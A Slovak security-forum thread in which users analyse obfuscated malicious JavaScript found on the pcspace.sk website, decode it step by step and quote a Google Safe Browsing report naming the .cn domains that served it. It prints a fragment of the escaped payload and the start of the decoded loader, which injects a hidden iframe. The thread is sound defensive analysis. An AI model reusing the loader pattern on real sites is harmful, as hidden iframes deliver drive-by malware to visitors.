PCspace.sk - distribuujeme malware

Bezpečnosť na internet a všetko okolo nej....
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

Pokiaľ ste dnes navštívili PCspace.sk, a mali zapnutý antivírus (povedzme NOD) a JavaScript, antivirák vám zobrazil dosť nepeknú hlášku podobnú tejto:
Obrázok
Keď mi Matej Koleják poslal tento screenshot, najprv som si myslel že sa jedná o nechutný žart a že u neho doznieva prvý apríl. Po návšteve stránky s firefox rozšírením NoScript (zakazuje elementy ako JS a Flash), a následnú inšpekciu DOM kódu, som zistil že sa nejedná o žart, ale v záhlaví sa nachádzal nasledovný silno obfuskovaný kód:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>
Po preložení sa z neho stalo toto:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>

Kde som zistil že kód má 2 levely obfuskácie, pričom druhý je realizovaný pomocou jednoduchého URL kódu (komu sa ho podarí dešifrovať nech mi pošle SS). Malware pravdepodobne sťahuje niečo z adresy uvedenej na obrázku.

To že JS sa oplatí mať vypnutý sa opäť potvrdilo, jedno z najlepších rozšírení NoScript taktiež pomohlo (každý by si ho mal nainštalovať, web je potom ozaj bezpečnejší), no a NOD32? Ukázal sa v dobrom svetle.

Za tip ďakujem Matejovi Kolejákovi (crux2005).

//edit 15:56:

Screenshot ako POC

Obrázok

//edit 13:37:

Dekodovany kod:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>
Naposledy upravil/-a Snake v Ne 12. Apr, 2009, 13:37, upravené celkom 1 krát.
Dôvod: space3.txt





.
Používateľov profilový obrázok
Gudas
VIP
VIP
Príspevky: 6514
Dátum registrácie: Po 09. Okt, 2006, 02:00
Bydlisko: Rudina (27)

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Gudas »

Fuj, prasata!
Kto ten web píše? Však to jak nejaký underground porno-warez server, bordel načítaný hneď na prvej stránke...
Spoiler: ukázať
Desktop| ASRock Z68 Pro3-M | Core i3 3220 @ 3,4GHz + Phanteks PH-TC14PE (pasívne) | 12GiB DDR3 1333MHz | MSI GTX760 Gaming | SuperFlower Golden King 550W 80+ Platinum | Crucial m4 256GB + WD 1TB Red 2,5" 5400rpm @ Scythe Quiet Drive| Fractal Design Define Mini + Nexus D12SL-12 + Noiseblocker PK-1 + Scythe Gentle Typhoon | LG IPS235 + LG L225WT | Creative Inspire T2900 + Beyerdynamic DT990 Pro + Creative X-Fi HD | Logitech MX1100 + QcK Steel mini
Laptop| Acer Aspire One 753 | Celeron U3400 (1,06GHz) | 2x2GiB DDR3 | A-DATA S599 128GB
PC.sk IRC kanál PC.sk
Práve testujem: - Next: -
Používateľov profilový obrázok
Thunderbolt
Používateľ
Používateľ
Príspevky: 338
Dátum registrácie: Št 02. Apr, 2009, 18:55
Bydlisko: Košice

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Thunderbolt »

Aj mne NODka ukázala že je tam nejaký koník.
CPU: AMD Ryzen 9 5900X CPU Cooler: Scythe Fuma 2 MB: MSI MPG B550 Gaming Edge WIFI GPU: SAPPHIRE NITRO+ Radeon RX 6900XT 16GB RAM: Crucial Ballistix 4x32GB 3200 Mhz Cl 16 SDD1: Samsung 980 Pro 1TB SSD2: Samsung 980 Pro 2TB PSU: Corsair RMx 750 CASE: Fractal Design Meshify S2 Dark TG LCD1: LG 34GN850 LCD2: EIZO EV2450-BK OS: Windows 10 Pro 64-bit DAC/Amp: Schiit Hel
Používateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 850
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa pEpinko »

Mozem sa spytat, co znamena obfuskacia pomocu jednoducheho URL kodu?

Ja som to chvilu pozeral a dopracoval som sa k tomu ze cele to smeruje na cinsku domenu.

Inak pozeram, ze sa nam tu nejak rozrastla cenzura, clanok o Malackach a ich webe nejako nemozem najst...
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

Obfuskovaný kód >> http://en.wikipedia.org/wiki/Obfuscated_code" onclick="window.open(this.href);return false;

Ano smeruje to na .cn doménu

Čo sa týka článku malacky.sk, objaví sa tu keď sa tá chyba fixne, ako som písal aj tam, scritp-kiddies podporovať nemienim.





.
Používateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 850
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa pEpinko »

Co je obfuskovany kod viem, ale zaujimalo ma ci je obfuskacia pomocou jednoducheho URL nieco extra...

Ale kod to bol celkom zaujimavy asi by som mal pozerat take cosi castejsie. Cele to treba 2 krat dekodovat aby sme sa k niecomu dostali. Musim povedat, ze sucasne obfuskatory robia dobru pracu.

Ad Malacky: Chapem, zbytocne by sa tym poskodzovalo mesto... (Som zvedavy ci a ak ano tak kedy to vsetko opravia :) )
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

pEpinko: čím si preložil ešte string po HEX kóde? mne to pomocou jednoduchého

Kód: Vybrať všetko

<script type="text/javascript">
var array = "string";
array = unescape(array);
</script>
document.write(array);
nešlo :(





.
Používateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 850
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa pEpinko »

Po tom prelozeni (do tvojho space2.txt) je tam nieco ako

Kód: Vybrať všetko

faqCg('%32%37%31%33%30%33%35%32%46%05%3c%3c%05%29%5d%54 ...
je jasne ze, kod ktory nas zaujima je prave tam. Po prvom pohlade je jasne, ze je to string ktory vznikol pomocou funkcie javascriptu escape. V com nas utvrdi aj kod, kedze je tam riadok

Kód: Vybrať všetko

jFHtK = unescape(jFHtK);
Problemom ale je ze sa tam nachadzaju aj znaky ako backspace... A celkovo je to neecitatelne, dalej sa v kode ale robia upravy nad tymto stringom. Kedze sa mi ich nechcelo lustit, pekne som to oddebugoval vo virtualnom stroji kde mi nic nemoze :) . Potom som z tej jednej premennej skopcil kod.

Zacina nejak takto:

Kód: Vybrať všetko

function VzNQs() {};
VzNQs.prototype = {
  install: function() {
    if (!this.alreadyInstalled()) {
      var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>";
      try {
Pripadnym zaujemcom ho poslem aj cely.
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

môžeš to niekam hodiť :-)





.
Používateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 850
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa pEpinko »

Dufam ze to pojde. ZIP ARCHIV

Niektore veci v tvare 5%^%Jhygded.replace('/gfhe/', ''); som uz vyhodnotil a prelepil to v kode aby to bolo citatelnejsie, inak je kod bez uprav.
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

zaujímavé čítanie :-) dík :)





.
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

UPS
Safe Browsing
Diagnostic page for pcspace.sk

What is the current listing status for pcspace.sk?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 451 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-12, and the last time suspicious content was found on this site was on 2009-01-14.

Malicious software includes 229 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 9 new process(es) on the target machine.

Malicious software is hosted on 2 domain(s), including originalcn.cn/, typecn.cn/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including mostdey.cn/.

This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, pcspace.sk did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.
Navyše, vidím že oni to celkom ignorujú (správa z google a aj užívateľov)

http://www.pcsforum.sk/viewtopic.php?f=10&t=15104" onclick="window.open(this.href);return false;
http://www.pcsforum.sk/viewtopic.php?f=18&t=14256" onclick="window.open(this.href);return false;
http://www.pcsforum.sk/viewtopic.php?f=10&t=10040" onclick="window.open(this.href);return false;





.
Používateľov profilový obrázok
Gudas
VIP
VIP
Príspevky: 6514
Dátum registrácie: Po 09. Okt, 2006, 02:00
Bydlisko: Rudina (27)

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Gudas »

...čiže ináč povedané: vieme o tom už dlhšie, zatiaľ to nevieme riešiť, tak sem-tam treba rátať s nejakým tým malware na pcspace.sk. Pokúsime sa to definitívne riešiť bohviekedy...

Nice one :rolleyes:
Spoiler: ukázať
Desktop| ASRock Z68 Pro3-M | Core i3 3220 @ 3,4GHz + Phanteks PH-TC14PE (pasívne) | 12GiB DDR3 1333MHz | MSI GTX760 Gaming | SuperFlower Golden King 550W 80+ Platinum | Crucial m4 256GB + WD 1TB Red 2,5" 5400rpm @ Scythe Quiet Drive| Fractal Design Define Mini + Nexus D12SL-12 + Noiseblocker PK-1 + Scythe Gentle Typhoon | LG IPS235 + LG L225WT | Creative Inspire T2900 + Beyerdynamic DT990 Pro + Creative X-Fi HD | Logitech MX1100 + QcK Steel mini
Laptop| Acer Aspire One 753 | Celeron U3400 (1,06GHz) | 2x2GiB DDR3 | A-DATA S599 128GB
PC.sk IRC kanál PC.sk
Práve testujem: - Next: -
Používateľov profilový obrázok
Snake
VIP
VIP
Príspevky: 13677
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta

Re: PCspace.sk - distribuujeme malware

Príspevok od používateľa Snake »

jop, presne tak to je myslené





.

Návrat na "Security"